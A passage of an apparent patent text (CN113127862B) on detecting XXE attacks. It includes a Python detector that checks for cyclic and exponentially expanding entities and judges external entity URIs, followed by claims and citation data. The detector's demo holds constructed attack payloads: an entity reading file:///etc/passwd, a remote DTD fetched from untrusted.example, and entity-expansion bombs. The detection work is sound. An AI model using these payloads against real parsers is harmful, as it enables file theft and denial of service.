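ENTITY_RE = re.compile(  # general (&x;) and parameter (%x;) entities, double-quoted only
    r'<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[\w.\-]+)\s+'
    r'(?:(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"|"(?P<val>[^"]*)")',
    re.IGNORECASE)
REF_RE = re.compile(r"[&%]([\w.\-]+);")


class Entity:
    def __init__(self, name: str, value: str = "", uri: Optional[str] = None) -> None:
        self.name, self.value, self.uri = name, value, uri
        self.refs: List[str] = REF_RE.findall(value)  # entities this one calls


def is_xml_document(content_type: str, body: bytes) -> bool:
    """Screen a data file by its Content-Type field or by its file header."""
    head = body.lstrip(b"\xef\xbb\xbf \t\r\n")[:9].lower()
    return "xml" in content_type.lower() or head.startswith((b"<?xml", b"<!doctype"))


def parse_entities(doc: str) -> Dict[str, Entity]:
    """Syntax stage: the entity reference graph of the internal DTD subset."""
    m = DOCTYPE_RE.search(doc)
    entities: Dict[str, Entity] = {}
    for em in ENTITY_RE.finditer(m.group(1) if m else ""):
        entities.setdefault(em.group("name"),
                            Entity(em.group("name"), em.group("val") or "", em.group("uri")))
    return entities


def has_cycle(entities: Dict[str, Entity]) -> bool:
    """DoS check 1: cyclic calls between entities (a -> b -> a), by DFS colouring."""
    state: Dict[str, int] = {}  # 1 = on the current path, 2 = fully explored

    def visit(n: str) -> bool:
        state[n] = 1
        for r in entities[n].refs:
            if r in entities and (state.get(r) == 1 or (r not in state and visit(r))):
                return True
        state[n] = 2
        return False

    return any(n not in state and visit(n) for n in entities)


def expanded_size(name: str, entities: Dict[str, Entity], memo: Dict[str, int]) -> int:
    """Bytes produced when `name` is fully expanded (call only after has_cycle is False)."""
    if name not in memo:
        e = entities[name]
        memo[name] = len(REF_RE.sub("", e.value)) + sum(
            expanded_size(r, entities, memo) for r in e.refs if r in entities)
    return memo[name]


def amplification(entities: Dict[str, Entity]) -> float:
    """DoS check 2: exponential expansion, measured as expanded size / declared size."""
    memo: Dict[str, int] = {}
    declared = sum(len(e.value) for e in entities.values())
    biggest = max((expanded_size(n, entities, memo) for n in entities), default=0)
    return biggest / max(declared, 1)


def external_call_links(entities: Dict[str, Entity]) -> List[Tuple[str, str, str]]:
    """Semantic stage: restore initial-entity -> final-entity chains ending in an external call."""
    links: List[Tuple[str, str, str]] = []
    for start in entities:
        seen, stack = set(), [start]
        while stack:
            n = stack.pop()
            if n in seen or n not in entities:
                continue
            seen.add(n)
            if entities[n].uri is not None:
                links.append((start, n, entities[n].uri))
            stack.extend(entities[n].refs)
    return links


def judge_uri(uri: str) -> Optional[str]:
    """Reason a link is malicious, or None when it passes the sensitive-file and domain checks."""
    p = urlparse(uri.strip())
    if p.scheme.lower() in ("", "file"):
        if (p.path or uri).lower().startswith(SENSITIVE_PATH_PREFIXES):
            return f"references internal sensitive file {uri}"
        return None
    host = (p.hostname or "").lower()
    return None if host in TRUSTED_DOMAINS else f"external call to untrusted host {host or uri}"


def detect_xxe(content_type: str, body: bytes) -> Dict[str, object]:
    """Whole flow: identify XML, analyse, judge; 'black' documents would be intercepted."""
    if not is_xml_document(content_type, body):
        return {"verdict": "not-xml", "findings": []}
    entities = parse_entities(body.decode("utf-8", "replace"))
    findings: List[str] = []
    if has_cycle(entities):
        findings.append("DoS: cyclic entity call")
    elif (amp := amplification(entities)) > MAX_AMPLIFICATION:
        findings.append(f"DoS: exponential expansion (x{amp:.0f})")
    for start, final, uri in external_call_links(entities):
        reason = judge_uri(uri)
        if reason:
            findings.append(f"{start} -> {final}: {reason}")
    return {"verdict": "black" if findings else "white", "findings": findings}


# Constructed sample traffic for the demo (not captured data).
BENIGN = b'<?xml version="1.0"?><!DOCTYPE n [<!ENTITY co "Example Corp">]><n>&co;</n>'
CYCLIC = b'<!DOCTYPE x [<!ENTITY a "&b;"><!ENTITY b "&a;">]><x>&a;</x>'
EXPAND = ('<!DOCTYPE x [<!ENTITY l0 "lol">' + "".join(
    f'<!ENTITY l{i} "{"&l%d;" % (i - 1) * 10}">' for i in range(1, 5)) + "]><x>&l4;</x>").encode()
FILEREF = b'<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>'
REMOTE = b'<!DOCTYPE x [<!ENTITY % p SYSTEM "http://untrusted.example/x.dtd">%p;]><x/>'

if __name__ == "__main__":  # demo run over the constructed samples
    for b in (BENIGN, CYCLIC, EXPAND, FILEREF, REMOTE):
        print(detect_xxe("application/xml", b))
```

`detect_xxe` returns the black/white verdict together with the findings that justify it, which is the "attack prompt information" a reporting unit would carry; the amplification ratio is a size estimate computed without actually expanding anything, so the detector itself cannot be exhausted by the document it inspects.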
The present embodiment exists as an embodiment of the apparatus corresponding to the above embodiment of the method, and has all the beneficial effects of the method embodiment, which are not described herein in detail.
Based on the above embodiment, the present application further provides an electronic device, where the electronic device may include a memory and a processor, where the memory stores a computer program, and the processor may implement the steps provided in the above embodiment when calling the computer program in the memory. Of course, the electronic device may also include various necessary network interfaces, power supplies, and other components, etc.
The present application also provides a readable storage medium having stored thereon a computer program which, when executed by an execution terminal or a processor, can implement the steps provided by the above embodiments. The storage medium may include: a U-disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, or other various media capable of storing program codes.
In the description, each embodiment is described in a progressive manner, and each embodiment is mainly described by the differences from other embodiments, so that the same similar parts among the embodiments are mutually referred. For the device disclosed in the embodiment, since it corresponds to the method disclosed in the embodiment, the description is relatively simple, and the relevant points refer to the description of the method section.
Those of skill would further appreciate that the various illustrative elements and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, computer software, or combinations of both, and that the various illustrative elements and steps are described above generally in terms of functionality in order to clearly illustrate the interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the solution. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present application.
Specific examples are set forth herein to illustrate the principles and embodiments of the present application, and the description of the examples above is only intended to assist in understanding the methods of the present application and their core ideas. It will be apparent to those skilled in the art that various changes and modifications can be made herein without departing from the principles of the application, which are intended to be covered by the appended claims.
It should also be noted that in this specification, relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising one … …" does not exclude the presence of other like elements in a process, method, article, or apparatus that comprises an element.

Claims (9)

1. An XXE attack detection method, comprising:
acquiring an XML document to be detected;
carrying out grammar analysis on the XML document to obtain a grammar analysis result; the grammar analysis result comprises the quotation relation among the entities in the XML document;
detecting whether XXE attack exists according to the grammar analysis result;
wherein, the detecting whether XXE attack exists according to the syntax analysis result comprises: judging whether XXE attack exists in the XML document according to the reference relation;
and, the parsing the XML document to obtain a parsing result includes: extracting a document type definition part from the XML document; analyzing the document type definition part by using a grammar engine to obtain a grammar tree; and obtaining the reference relation among the entities according to the relation among the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
2. The XXE attack detection method according to claim 1, wherein said detecting whether there is an XXE attack based on the result of the parsing includes:
extracting and obtaining a quotation relation among the entities from the grammar analysis result;
detecting whether DOS attacks in the XXE attacks exist according to the reference relation.
3. The XXE attack detection method according to claim 2, wherein said detecting whether there is a DOS attack in the XXE attack according to the reference relation comprises:
judging whether the reference relation has cyclic call among different entities or not;
if the cyclic call among different entities exists, determining that the cyclic call attack exists in the DOS attack;
or alternatively,
judging whether different entities which are expanded according to indexes exist in the quotation relation;
if different entities which are expanded exponentially exist, determining that an exponential expansion attack exists in the DOS attack.
4. The XXE attack detection method according to claim 1, wherein said detecting whether there is an XXE attack based on the result of the parsing includes:
carrying out semantic analysis on the grammar analysis result to obtain a semantic analysis result;
restoring according to the semantic analysis result to obtain a real relationship between the initial entity and the final entity;
screening and obtaining an external call link containing external call in each real relation;
judging whether the external content corresponding to the external call link has malicious content or not;
if malicious content exists, it is determined that an external malicious content injection attack exists in the XXE attack.
5. The XXE attack detection method according to claim 1, wherein said obtaining an XML document to be detected comprises:
acquiring all data files contained in the flow to be detected;
and screening the content type field or the file header content of each data file to obtain the XML document to be detected.
6. The XXE attack detection method according to any one of claims 1 to 5, further comprising, after detecting the presence of said XXE attack:
masking all calls detected as belonging to the target entity of the XXE attack;
and reporting attack prompt information containing the target entity through a preset path.
7. An XXE attack detection device comprising:
the XML document acquisition unit to be detected is used for acquiring the XML document to be detected;
the grammar analysis unit is used for carrying out grammar analysis on the XML document to obtain a grammar analysis result; the grammar analysis result comprises the quotation relation among the entities in the XML document;
an XXE attack detection unit for detecting whether an XXE attack exists according to the grammar analysis result;
the XXE attack detection unit is specifically configured to determine whether XXE attack exists in the XML document according to the reference relationship;
and, the syntax analysis unit includes:
a document type definition part extraction subunit configured to extract a document type definition part from the XML document;
a parsing subunit, configured to parse the document type definition portion by using a syntax engine to obtain a syntax tree;
and the reference relation acquisition subunit is used for acquiring the reference relation between the entities according to the relation between the entities on the grammar tree, and taking the reference relation as the grammar analysis result.
8. An electronic device, comprising:
a memory for storing XXE attack detection programs;
a processor for implementing the steps of the XXE attack detection method of any one of claims 1 to 6 when executing the XXE attack detection program.
9. A readable storage medium, wherein a XXE attack detection program is stored on the readable storage medium, which XXE attack detection program, when executed by a processor, implements the steps of the XXE attack detection method of any of claims 1 to 6.
CN201911414859.6A 2019-12-31 2019-12-31 XXE attack detection method and device, electronic equipment and storage medium Active CN113127862B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201911414859.6A CN113127862B (en) 2019-12-31 2019-12-31 XXE attack detection method and device, electronic equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201911414859.6A CN113127862B (en) 2019-12-31 2019-12-31 XXE attack detection method and device, electronic equipment and storage medium

Publications (2)

Publication Number Publication Date
CN113127862A CN113127862A (en) 2021-07-16
CN113127862B CN113127862B (en) 2023-05-12

Family

ID=76770475

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201911414859.6A Active CN113127862B (en) 2019-12-31 2019-12-31 XXE attack detection method and device, electronic equipment and storage medium

Country Status (1)

Country Link
CN (1) CN113127862B (en)

Families Citing this family (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115174244A (en) * 2022-07-14 2022-10-11 湖北天融信网络安全技术有限公司 Safety detection method and system
CN117294527B (en) * 2023-11-22 2024-02-27 北京微步在线科技有限公司 Attack judging method, device, storage medium and equipment

Citations (3)

Publication number Priority date Publication date Assignee Title
WO2017056121A1 (en) * 2015-09-28 2017-04-06 Minded Security S.R.L. Method for the identification and prevention of client-side web attacks
CN109067813A (en) * 2018-10-24 2018-12-21 腾讯科技(深圳)有限公司 Network hole detection method, device, storage medium and computer equipment
CN110532779A (en) * 2019-07-19 2019-12-03 中移(杭州)信息技术有限公司 A kind of method, apparatus of Hole Detection, terminal and storage medium

Family Cites Families (2)

Publication number Priority date Publication date Assignee Title
US10805345B2 (en) * 2017-09-29 2020-10-13 Paypal, Inc. Blind injection attack mitigation
US10764319B2 (en) * 2017-10-05 2020-09-01 Honeywell International Inc. Intelligent automated security vulnerability detection and analysis for industrial internet of things (IIOT) devices

Non-Patent Citations (4)

Title
A Guide to XML eXternal Entity Processing; Rachel Hogue; cs.tufts.edu; 2015-12-31; pp. 1-10 *
Research on XML parsing security problems and countermeasures; 顾韵华 et al.; Computer Security (计算机安全); 2009-11-15 (no. 11); full text *
Research on XXE vulnerabilities and their defense strategies; 应宗浩 et al.; Technology Wind (科技风); 2018-07-05 (no. 19); full text *
A SOA-based secure transmission mechanism for SOAP messages; 华悦 et al.; Computer Science (计算机科学); 2012-06-15 (no. 06); full text *

Also Published As

Publication number Publication date
CN113127862A (en) 2021-07-16

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant